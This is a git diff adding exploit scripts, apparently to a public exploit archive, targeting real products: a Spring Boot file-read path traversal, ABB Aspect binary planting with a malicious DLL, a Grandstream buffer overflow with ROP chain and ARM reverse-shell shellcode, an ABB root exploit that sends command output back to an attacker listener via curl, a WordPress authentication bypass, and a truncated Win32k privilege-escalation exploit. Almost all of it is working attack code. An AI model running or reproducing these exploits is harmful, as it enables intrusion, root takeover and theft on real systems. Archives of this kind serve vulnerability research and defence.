diff --git a/exploits/java/webapps/52304.py b/exploits/java/webapps/52304.py new file mode 100755 index 000000000..f60cbd628 --- /dev/null +++ b/exploits/java/webapps/52304.py @@ -0,0 +1,57 @@ +# Exploit Title: Java-springboot-codebase 1.1 - Arbitrary File Read +# Google Dork: +# Date: 23/May/2025 +# Exploit Author: d3sca +# Vendor Homepage: https://github.com/OsamaTaher/Java-springboot-codebase +# Software Link: https://github.com/OsamaTaher/Java-springboot-codebase +# Version: [app version] 1.1 +# Tested on: Debian Linux +# CVE : CVE-2025-46822 + +#usage: python3 cve-2025-46822.py http://victim.com /etc/passwd + +import argparse +import requests + +from urllib.parse import quote +def exploit(target, file_path, output=None): + # Ensure the file path is absolute + if not file_path.startswith('/'): + print("[!] Warning: File path is not absolute. Prepending '/' to make it absolute.") + file_path = '/' + file_path.lstrip('/') + + # URL-encode the file path + encoded_path = quote(file_path, safe='') + + # Construct the target URL + endpoint = f"/api/v1/files/{encoded_path}" + url = target.rstrip('/') + endpoint + print(f"[*] Attempting to retrieve: {file_path}") + print(f"[*] Sending request to: {url}") + try: + response = requests.get(url, allow_redirects=False, timeout=10) + + if response.status_code == 200: + print("[+] File retrieved successfully!") + if output: + with open(output, 'wb') as f: + f.write(response.content) + print(f"[+] Content saved to: {output}") + else: + print("\nFile contents:") + print(response.text) + else: + print(f"[-] Failed to retrieve file. Status code: {response.status_code}") + print(f"[-] Response: {response.text[:200]}") # Show first 200 chars of response + except Exception as e: + print(f"[-] An error occurred: {str(e)}") + +if name == "main": + parser = argparse.ArgumentParser(description="Exploit Path Traversal Vulnerability in Unauthenticated File API") + parser.add_argument("target", help="Target base URL (e.g., http://victim:8080)") + parser.add_argument("file_path", help="Absolute path to target file (e.g., /etc/passwd)") + parser.add_argument("-o", "--output", help="Output file to save contents") + + args = parser.parse_args() + + exploit(args.target, args.file_path, args.output) \ No newline at end of file diff --git a/exploits/multiple/local/52306.txt b/exploits/multiple/local/52306.txt new file mode 100644 index 000000000..d998d9558 --- /dev/null +++ b/exploits/multiple/local/52306.txt @@ -0,0 +1,111 @@ +# Exploit Title: ABB Cylon Aspect Studio 3.08.03 - Binary Planting +# Vendor: ABB Ltd. +# Product web page: https://www.global.abb +# Affected version: <=3.08.03 +# Tested on: Microsoft Windows 10 Home (EN) OpenJDK 64-Bit Server VM Temurin-21.0.6+7 +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience + +# Advisory ID: ZSL-2025-5952 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5952.php + +# CVE ID: CVE-2024-13946 +# CVE URL: https://www.cve.org/CVERecord/SearchResults?query=CVE-2024-13946 + +C:\> type project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +C:\Aspect\Aspect-Studio-3.08.03> del CylonLicence.dll +C:\Aspect\Aspect-Studio-3.08.03> type aspect.bat +REM 64bit parameters +jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar + +C:\Aspect\Aspect-Studio-3.08.03-a09>aspect.bat + +C:\Aspect\Aspect-Studio-3.08.03-a09>REM 64bit parameters + +C:\Aspect\Aspect-Studio-3.08.03-a09>jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar + + +C:\Aspect\Aspect-Studio-3.08.03> type AspectStudio.class +... +... +System.loadLibrary("CylonLicence"); +} catch (Throwable t) {} +LoggerUtil.logger.error("Error loading license DLL", t); +} +} +... +... + +C:\Aspect\Aspect-Studio-3.08.03> cd logs +C:\Aspect\Aspect-Studio-3.08.03\logs>type AspectStudio.log + +ERROR: 2025-01-16 16:47:58,579 Error loading license DLL [main] +java.lang.UnsatisfiedLinkError: no CylonLicence in java.library.path + at java.lang.ClassLoader.loadLibrary(ClassLoader.java:1867) + at java.lang.Runtime.loadLibrary0(Runtime.java:870) + at java.lang.System.loadLibrary(System.java:1122) + at com.aamatrix.util.AspectStudio.(AspectStudio.java:42) + at com.aamatrix.vib.rrobin.CylonLicense.(CylonLicense.java:18) + at com.aamatrix.vib.rrobin.LicenseService.(LicenseService.java:38) + at com.aamatrix.vib.rrobin.LicenseService.(LicenseService.java:34) + at com.aamatrix.projectmanager.AspectStudio.(AspectStudio.java:52) + at java.lang.Class.forName0(Native Method) + at java.lang.Class.forName(Class.java:348) + at com.aamatrix.projectmanager.AspectStudioLauncher.main(AspectStudioLauncher.java:70) + ... + ... + +C:\DLL-Mala> type CylonLicence.cpp + +#define WIN32_LEAN_AND_MEAN +#include +#include + + +extern "C" __declspec(dllexport) +DWORD WINAPI ExecuteCmdThread(LPVOID lpParam) { + ShellExecuteW(NULL, L"open", L"cmd.exe", L"/c start", NULL, SW_SHOWNORMAL); + return 0; +} + +extern "C" __declspec(dllexport) +BOOL APIENTRY DllMain(HMODULE hModule, + DWORD ul_reason_for_call, + LPVOID lpReserved) { + switch (ul_reason_for_call) { + case DLL_PROCESS_ATTACH: + CreateThread(NULL, 0, ExecuteCmdThread, NULL, 0, NULL); + break; + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + break; + } + return TRUE; +} \ No newline at end of file diff --git a/exploits/multiple/remote/52303.py b/exploits/multiple/remote/52303.py new file mode 100755 index 000000000..4ba4c6c12 --- /dev/null +++ b/exploits/multiple/remote/52303.py @@ -0,0 +1,247 @@ +#!/usr/bin/env python3 + +# Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow +# Google Dork: [if applicable] +# Date: 2025-05-23 +# Exploit Author: Pepelux (user in ExploitDB) +# Vendor Homepage: https://www.grandstream.com/ +# Software Link: [download link if available] +# Version: Grandstream GSD3710 - firmware:1.0.11.13 and lower +# Tested on: Linux and MacOS +# CVE: CVE-2022-2070 + +""" +Author: Jose Luis Verdeguer (@pepeluxx) + +Required: Pwntools + +Example: + +Terminal 1: +$ ncat -lnvp 4444 + +Terminal 2: +$ python 3 CVE-2020-2070.py -ti DEVICE_IP -tp 8081 -ri LOCAL_IP -rp 4444 +""" + +from operator import ge +import sys +import time +from pwn import * + +import argparse + + +def get_args(): + parser = argparse.ArgumentParser( + formatter_class=lambda prog: argparse.RawDescriptionHelpFormatter( + prog, max_help_position=50)) + + # Add arguments + parser.add_argument('-ti', '--target_ip', type=str, required=True, + help='device IP address', dest="device_ip") + parser.add_argument('-tp', '--target_port', type=int, required=True, default=8081, + help='device port', dest="device_port") + parser.add_argument('-ri', '--reverse_ip', type=str, required=True, + help='reverse IP address', dest="reverse_ip") + parser.add_argument('-rp', '--reverse_port', type=int, required=True, + help='reverse port', dest="reverse_port") + + # Array for all arguments passed to script + args = parser.parse_args() + + try: + TI = args.device_ip + TP = args.device_port + RI = args.reverse_ip + RP = args.reverse_port + + return TI, TP, RI, RP + except ValueError: + exit() + + +def check_badchars(data): + for i in range(len(data)): + if data[i] in [0x0, 0x40]: + log.warn("Badchar %s detected at %#x" % (hex(data[i]), i)) + return True + return False + + +def get_shellcode(ip, port): + ip_bytes = socket.inet_aton(ip) + port_bytes = struct.pack(">H", port) + + # Linux ARM reverse shell + + # switch to thumb mode + sc = b"\x01\x30\x8F\xE2" # add r3, pc, #1 + sc += b"\x13\xFF\x2F\xE1" # bx r3 + + # socket(2, 1, 0) + sc += b"\x02\x20" # movs r0, #2 + sc += b"\x01\x21" # movs r1, #1 + sc += b"\x92\x1A" # subs r2, r2, r2 + sc += b"\xC8\x27" # movs r7, #0xc8 + sc += b"\x51\x37" # adds r7, #0x51 + sc += b"\x01\xDF" # svc #1 + sc += b"\x04\x1C" # adds r4, r0, #0 + + # connect(r0, &sockaddr, 16) + sc += b"\x0C\xA1" # adr r1, #0x30 + sc += b"\x4A\x70" # strb r2, [r1, #1] + sc += b"\x10\x22" # movs r2, #0x10 + sc += b"\x02\x37" # adds r7, #2 + sc += b"\x01\xDF" # svc #1 + + # dup2(sockfd, 0) + sc += b"\x3F\x27" # movs r7, #0x3f + sc += b"\x20\x1C" # adds r0, r4, #0 + sc += b"\x49\x1A" # subs r1, r1, r1 + sc += b"\x01\xDF" # svc #1 + + # dup2(sockfd, 1) + sc += b"\x20\x1C" # adds r0, r4, #0 + sc += b"\x01\x21" # movs r1, #1 + sc += b"\x01\xDF" # svc #1 + + # dup2(sockfd, 2) + sc += b"\x20\x1C" # adds r0, r4, #0 + sc += b"\x02\x21" # movs r1, #2 + sc += b"\x01\xDF" # svc #1 + + # execve("/bin/sh") + sc += b"\x06\xA0" # adr r0, #0x18 + sc += b"\x92\x1A" # subs r2, r2, r2 + sc += b"\x49\x1A" # subs r1, r1, r1 + sc += b"\x01\x91" # str r1, [sp, #4] + sc += b"\x02\x91" # str r1, [sp, #8] + sc += b"\x01\x90" # str r0, [sp, #4] + sc += b"\x01\xA9" # add r1, sp, #4 + sc += b"\xC2\x71" # strb r2, [r0, #7] + sc += b"\x0B\x27" # movs r7, #0xb + sc += b"\x01\xDF" # svc #1 + + sc += b"\x02\xFF" + sc += port_bytes + sc += ip_bytes + sc += b"/bin/shX" + + return sc + + +def main(): + ti, tp, ri, rp = get_args() + + # ROP Gadgets + + libc_base = 0x76ec1000 + + mprotect = libc_base + 0x93510+1 + pop_lr = libc_base + 0x1848C # pop {r0, r4, r8, ip, lr, pc} + pop_pc = libc_base + 0xd7515 # pop {pc} + pop_r0 = libc_base + 0x00064bb0+1 # 0x00064bb0 : pop {r0, pc} + + pop_r5 = libc_base + 0x00003738+1 # 0x00003738 : pop {r5, pc} + add_r1_sp = libc_base + 0x000b3c4e+1 # 0x000b3c4e : add r1, sp, #0x14 ; blx r5 + # 0x0002f83c (0x0002f83d): mov r0, r1; bx lr + mov_r0_r1 = libc_base + 0x0002f83d + # 0x0006a086 (0x0006a087): pop {r1, pc} + pop_r1 = libc_base + 0x6a087 + ands_r0_r1 = libc_base + 0x1feba+1 # 0x0001feba : ands r0, r1 ; bx lr + # 0x000a3a42 : movs r4, r0 ; pop {r1, pc} + mov_r4_r0 = libc_base + 0x000a3a42+1 + # 0x0001fdae (0x0001fdaf): movs r1, r0; bx lr + movs_r1_r0 = libc_base + 0x0001fdaf + + and_r0_f = libc_base + 0x8717e+1 # 0x0008717e : and r0, r0, #0xf ; bx lr + movs_r2_r0 = libc_base + 0x0001fc6a+1 # 0x0001fc6a : movs r2, r0 ; bx lr + mov_r0_r4 = libc_base + 0x0001f9d4+1 # 0x0001f9d4 : movs r0, r4 ; bx lr + blx_sp = libc_base + 0x46595 # 0x00046594 (0x00046595): blx sp + + shellcode = get_shellcode(ri, rp) + + auth_command = b"LOG/1.0 END CMD:AUTH_USERNAME @" + junk = p32(0x43434343) + + payload = auth_command + payload += b"A" * 144 + + # The goal is that R0 -> SP + + # R5 = pop {pc} + # because in the the next gadget we have a blx r5 + payload += p32(pop_r5) + payload += p32(pop_pc) # R5 = pop {pc} + + # R1 = SP ; BLX pop {pc} + payload += p32(add_r1_sp) # add r1, sp, #0x14 ; blx r5 + + # Restore LR register (because it has been updated by the last BLX gadget) + payload += p32(pop_lr) # pop {r0, r4, r8, ip, lr, pc} + payload += junk*4 # r0, r4, r8, ip + payload += p32(pop_pc) # LR = pop {pc} + + # R0 = stack address + payload += p32(mov_r0_r1) # mov r0, r1; bx lr + + # R1 = mask page align + payload += p32(pop_r1) # pop {r1, pc} + payload += p32(0xfffe1001) + + # R0 = stack address & 0xfffe1001 + payload += p32(ands_r0_r1) # ands r0, r1 ; bx lr + # R4 = R0 + payload += p32(mov_r4_r0) # movs r0, r4 ; bx lr + payload += junk # r1 + + # mprotect params + # r0 = shellcode page aligned address + # r1 = size(ofshellcode) + # r2 = protection (0x7 – RWX) + + # R2 = 0x7 + payload += p32(pop_r0) + payload += p32(0x07070707) + payload += p32(and_r0_f) # R0 = 7 (RWX) + payload += p32(movs_r2_r0) # R2 (prot: 7 - RWX) + + # R1 = length = 0x10101010 (avoid 0's) + payload += p32(pop_r0) + payload += p32(0x01010101) + payload += p32(movs_r1_r0) # r1 (length: 0x10101010) + + # R0 = stack address 4k aligned + payload += p32(mov_r0_r4) + + # mprotect(stack, 0x10101010, 0x7) + payload += p32(mprotect) + payload += p32(blx_sp) # ejecutamos en pila + payload += shellcode # shellcode + + if check_badchars(payload[len(auth_command):]): + sys.exit(0) + + log.info("Device IP: %s:%d" % (ti, tp)) + log.info("Attacker IP: %s:%d" % (ri, rp)) + log.info("Payload len: %d" % len(payload)) + + count = 1 + + while True: + try: + print('Try: %d' % count) + r = remote(ti, tp) + r.send(payload) + log.success("Payload sent!") + # r.close() + time.sleep(1) + count += 1 + except: + sleep(3) + pass + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/multiple/remote/52305.py b/exploits/multiple/remote/52305.py new file mode 100755 index 000000000..829ff225e --- /dev/null +++ b/exploits/multiple/remote/52305.py @@ -0,0 +1,281 @@ +#!/usr/bin/env python +# +# +# Exploit Title: ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation +# +# +# Vendor: ABB Ltd. +# Product web page: https://www.global.abb +# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio +# Firmware: <=3.08.03 +# +# Summary: ASPECT is an award-winning scalable building energy management +# and control solution designed to allow users seamless access to their +# building data through standard building protocols including smart devices. +# +# Desc: The ABB BMS/BAS controller is vulnerable to code execution and sudo +# misconfiguration flaws. An authenticated remote code execution vulnerability +# in the firmware update mechanism allows an attacker with valid credentials to +# escalate privileges and execute commands as root. The process involves uploading +# a crafted .bsx file through projectUpdateBSXFileProcess.php, which is then moved +# to htmlroot and executed by projectUpdateBSXExecute.php. This script leverages +# sudo to run the uploaded bsx file, enabling the attacker to bypass input validation +# checks and execute arbitrary code, leading to full system compromise and unauthorized +# root access. +# +# --------------------------------------------------------------------------------- +# +# $ ./bsxroot.py 192.168.73.31 192.168.73.9 --creds guest:guest +# [o] Exploit starting at 21.05.2025 12:33:47 +# [o] Using credentials: guest:***** +# [o] Auth successfull. +# [o] PHPSESSID: g02p9tnog4d2r1z4eha1e9e688 +# [o] Listening on 192.168.73.9:5555... +# [o] Building name: ["Tower 3"] +# [o] runtime.ver=v3.08.03 +# [+] -> [virtual] rootshell +# +# # id +# uid=0(root) gid=0(root) groups=0(root) +# # pwd +# /home/MIX_CMIX/htmlroot +# exit +# [o] Removing callback file. +# [!] Connection terminated. +# +# --------------------------------------------------------------------------------- +# +# +# Tested on: GNU/Linux 3.15.10 (armv7l) +# GNU/Linux 3.10.0 (x86_64) +# GNU/Linux 2.6.32 (x86_64) +# Intel(R) Atom(TM) Processor E3930 @ 1.30GHz +# Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz +# PHP/7.3.11 +# PHP/5.6.30 +# PHP/5.4.16 +# PHP/4.4.8 +# PHP/5.3.3 +# AspectFT Automation Application Server +# lighttpd/1.4.32 +# lighttpd/1.4.18 +# Apache/2.2.15 (CentOS) +# OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) +# OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2025-5947 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5947.php +# +# +# 21.04.2024 +# +# + +from colorama import init, Fore +from urllib.parse import quote +from time import sleep +import threading +import datetime +import requests +import socket +import re +import os +import sys + +init() + +def safe(*trigger, ): + return True + +def auth(target_ip, user, pwd): + login_ep = f"http://{target_ip}/validate/login.php" + payload = { + 'f_user' : user, # 'aamuser, guest' + 'f_pass' : pwd, # 'default, guest' + 'submit' : 'Login' + } + sess = requests.Session() + r = sess.post(login_ep, data=payload) + if r.status_code == 200 and 'PHPSESSID' in sess.cookies: + print("[o] Auth successfull.") + phpsessid = sess.cookies.get('PHPSESSID') + print("[o] PHPSESSID:", phpsessid) + return sess.cookies + else: + print("[!] Auth failed.") + return None + +def kacuj(target_ip, listen_ip, cmd, token=None, cookies=None): + agentwho = "NetRanger/84.19" + payload = f"curl -A \"`{cmd}`\" {listen_ip}:5555" + url = f"http://{target_ip}/projectUpdateBSXFileProcess.php" + + headers = { + "Content-Type": "multipart/form-data; boundary=----zeroscience", + "User-Agent": agentwho + } + data = ( + "------zeroscience\r\n" + f"Content-Disposition: form-data; name=\"userfile\"; filename={AAM}\r\n" + "Content-Type: application/octet-stream\r\n\r\n" + f"{payload}\r\n" + '------zeroscience--\r\n' + ) + try: + r = requests.post(url, headers=headers, data=data, cookies=cookies) + if r.status_code == 200: + url_execute = f"http://{target_ip}/projectUpdateBSXExecute.php?file={AAM}" + r = requests.get(url_execute, cookies=cookies) + + return r.content + + except requests.exceptions.RequestException as e: + print(f"[!] Error sending payload: {e}") + + return None + +def koj_slusha(listen_ip): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + s.bind(("0.0.0.0", 5555)) + s.listen(1) + + print(f"[o] Listening on {listen_ip}:5555...") + + while True: + conn, addr = s.accept() + try: + data = conn.recv(9999) + if not data: + print("[!] Connection closed by remote host.") + break + dd = data.decode("utf-8", errors="ignore") + uam = re.search(r"User-Agent:\s*(.*)\s*Host:", dd, re.DOTALL) + if uam: + print(uam.group(1), end="") + else: + print + #print(f"[o] Full response:\n{dd}") + except Exception as e: + print(f"[!] Error while receiving data: {e}") + finally: + conn.close() + +def main(): + if safe(True): + print("\nSafety: \033[92mON\033[0m") + exit(-17) + else: + next + + global AAM + global start + AAM = "firmware.bsx" + + start = datetime.datetime.now() + start = start.strftime("%d.%m.%Y %H:%M:%S") + title = "\033[96mABB Cylon® ASPECT® Supervisory Building Control v3.08.03\033[0m" + subtl = "\033[95m\t\t-> Remote Root Exploit <-\033[0m" + prj = f""" + P R O J E C T\033[90m + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ +\033[0m + {title} + {subtl} + """ + if len(sys.argv) < 4: + print(prj) + print("./bsxroot.py ") + sys.exit(-0) + + target_ip = sys.argv[1] + listen_ip = sys.argv[2] + auth_arg = sys.argv[3] + + print("[o] Exploit starting at", start) + + if "--creds" in sys.argv: + creds_index = sys.argv.index("--creds") + 1 + if creds_index >= len(sys.argv): + print("[!] Error: Missing credentials after --creds.") + sys.exit(-1) + + user_pass = sys.argv[creds_index] + if ":" not in user_pass: + print("[!] Error: Invalid credentials format. Expected format: user:pass.") + sys.exit(-2) + + user, pwd = user_pass.split(":") + print(f"[o] Using credentials: {user}:{'*' * len(pwd)}") + cookies = auth(target_ip, user, pwd) + else: + token = auth_arg + cookies = {"PHPSESSID": token} + if not cookies: + sys.exit(-3) + + nishka = threading.Thread(target=koj_slusha, args=(listen_ip,)) + nishka.daemon = True + nishka.start() + + bacname = f"http://{target_ip}/getApplicationNamesJS.php" + r = requests.get(bacname) + if r.status_code == 200: + try: + r = r.content + decor = r.decode("utf-8") + except UnicodeDecodeError: + decor = r.decode("utf-8", errors="ignore") + + odg = re.search(r"var instanceDirectory=(.*?);", decor) + if odg: + cmd = "echo -ne \"[o] \" ; cat runtime/release.properties | grep -w 'runtime.ver'" + print("[o] Building name:", odg.group(1)) + kacuj(target_ip, listen_ip, cmd, token=None, cookies=cookies) + print("\033[92m[+] -> [virtual] rootshell\033[0m\n") + else: + print("[o] Unknown building name.") + sleep(0.01) + + while True: + sleep(0.01) + cmd = input("# ") + if cmd.lower() in ["exit", "quit"]: + print("[o] Removing callback file.") + kacuj(target_ip, listen_ip, "rm /tmp/" + AAM, token=None, cookies=cookies) + print("\033[91m[!] Connection terminated.\033[0m") + os._exit(-17) + + kacuj(target_ip, listen_ip, cmd, token=None, cookies=cookies) + + nishka.join() + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/52302.py b/exploits/multiple/webapps/52302.py new file mode 100755 index 000000000..20036eeb6 --- /dev/null +++ b/exploits/multiple/webapps/52302.py @@ -0,0 +1,65 @@ +#!/usr/bin/env python3 +# Exploit Title: WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass +# Date: 2025-05-22 +# Exploit Author: Mohammed Idrees Banyamer +# Vendor Homepage: https://wordpress.org/plugins/user-registration/ +# Software Link: https://downloads.wordpress.org/plugin/user-registration.4.1.2.zip +# Version: <= 4.1.2 +# Tested on: WordPress 6.x, Apache on Linux +# CVE: CVE-2025-2594 + +import requests +import sys +import argparse +from urllib.parse import urljoin +from termcolor import cprint, colored + +def banner(): + cprint("┌──────────────────────────────────────────────┐", "cyan") + cprint("│ WordPress Plugin User Registration <= 4.1.2 │", "cyan") + cprint("│ Authentication Bypass Exploit (CVE-2025-2594)│", "cyan") + cprint("│ Author: Mohammed Idrees Banyamer │", "cyan") + cprint("└──────────────────────────────────────────────┘", "cyan") + +def exploit(target_url, member_id, nonce): + endpoint = urljoin(target_url, "/wp-admin/admin-ajax.php") + + files = { + 'action': (None, 'user_registration_membership_confirm_payment'), + 'security': (None, nonce), + 'form_response': (None, '{"auto_login": true}'), + 'member_id': (None, str(member_id)) + } + + cprint(f"[+] Target URL: {endpoint}", "yellow") + cprint(f"[+] Attempting to bypass authentication as user ID {member_id}...\n", "yellow") + + try: + response = requests.post(endpoint, files=files, timeout=10) + + if response.status_code == 200 and '"success":true' in response.text: + cprint("[✓] Exploit successful! Authentication bypass achieved.", "green") + cprint("[!] Check your session/cookies - you may now be authenticated as the target user.\n", "green") + print("Server Response:") + print(response.text) + else: + cprint("[-] Exploit failed or invalid nonce/member_id.", "red") + print("Server Response:") + print(response.text) + except requests.exceptions.RequestException as e: + cprint(f"[!] Request failed: {e}", "red") + +def main(): + banner() + + parser = argparse.ArgumentParser(description="CVE-2025-2594 - WordPress Plugin Authentication Bypass") + parser.add_argument("target", help="Base target URL (e.g., http://localhost)") + parser.add_argument("member_id", help="Target user ID (usually 1 for admin)") + parser.add_argument("nonce", help="_confirm_payment_nonce value from registration page") + + args = parser.parse_args() + + exploit(args.target, args.member_id, args.nonce) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/windows/local/52301.c b/exploits/windows/local/52301.c new file mode 100644 index 000000000..95a2a6109 --- /dev/null +++ b/exploits/windows/local/52301.c @@ -0,0 +1,623 @@ +# Exploit Title: Microsoft Windows Server 2016 - Win32k Elevation of +Privilege +# Date: 2025-05-19 +# Exploit Author: Milad Karimi (Ex3ptionaL) +# Contact: miladgrayhat@gmail.com +# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL +# Country: United Kingdom +# CVE : CVE-2023-29336 + + + + +#include +#include +#include + +#define IDM_MYMENU 101 +#define IDM_EXIT 102 +#define IDM_DISABLE 0xf120 +#define IDM_ENABLE 104 +#define EPROCESS_UNIQUE_PROCESS_ID_OFFSET 0x440 +#define EPROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x448 +#define EPROCESS_TOKEN_OFFSET 0x4b8 + +typedef DWORD64(NTAPI* NtUserEnableMenuItem)(HMENU hMenu, UINT +uIDEnableItem, UINT uEnable); + +typedef DWORD64(NTAPI* NtUserSetClassLongPtr)(HWND a1, unsigned int a2, +unsigned __int64 a3, unsigned int a4); +typedef DWORD64(NTAPI* NtUserCreateAcceleratorTable)(void* Src, int a2); +typedef DWORD64(NTAPI* fnNtUserConsoleControl)(int nConsoleCommand, PVOID, +int nConsoleInformationLength); + + +NtUserSetClassLongPtr g_NtUserSetClassLongPtr = NULL; +NtUserEnableMenuItem g_NtUserEnableMenuItem = NULL; +NtUserCreateAcceleratorTable g_NtUserCreateAcceleratorTable = NULL; +fnNtUserConsoleControl g_pfnNtUserConsoleControl = nullptr; +LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM +lParam); +int syytem(); +typedef struct _SHELLCODE { + DWORD reserved; + DWORD pid; + DWORD off_THREADINFO_ppi; + DWORD off_EPROCESS_ActiveLink; + DWORD off_EPROCESS_Token; + BOOL bExploited; + BYTE pfnWindProc[]; +} SHELLCODE, * PSHELLCODE; +struct tagMENU +{ + ULONG64 field_0; + ULONG64 field_8; + ULONG64 field_10; + ULONG64 field_18; + ULONG64 field_20; + PVOID obj28; + DWORD field_30; + DWORD flag1; + DWORD flag2; + DWORD cxMenu; + DWORD cyMenu; + ULONG64 field_48; + PVOID rgItems; + ULONG64 field_58; // + 0x58 + ULONG64 field_60; + ULONG64 field_68; + ULONG64 field_70; + ULONG64 field_78; + ULONG64 field_80; + ULONG64 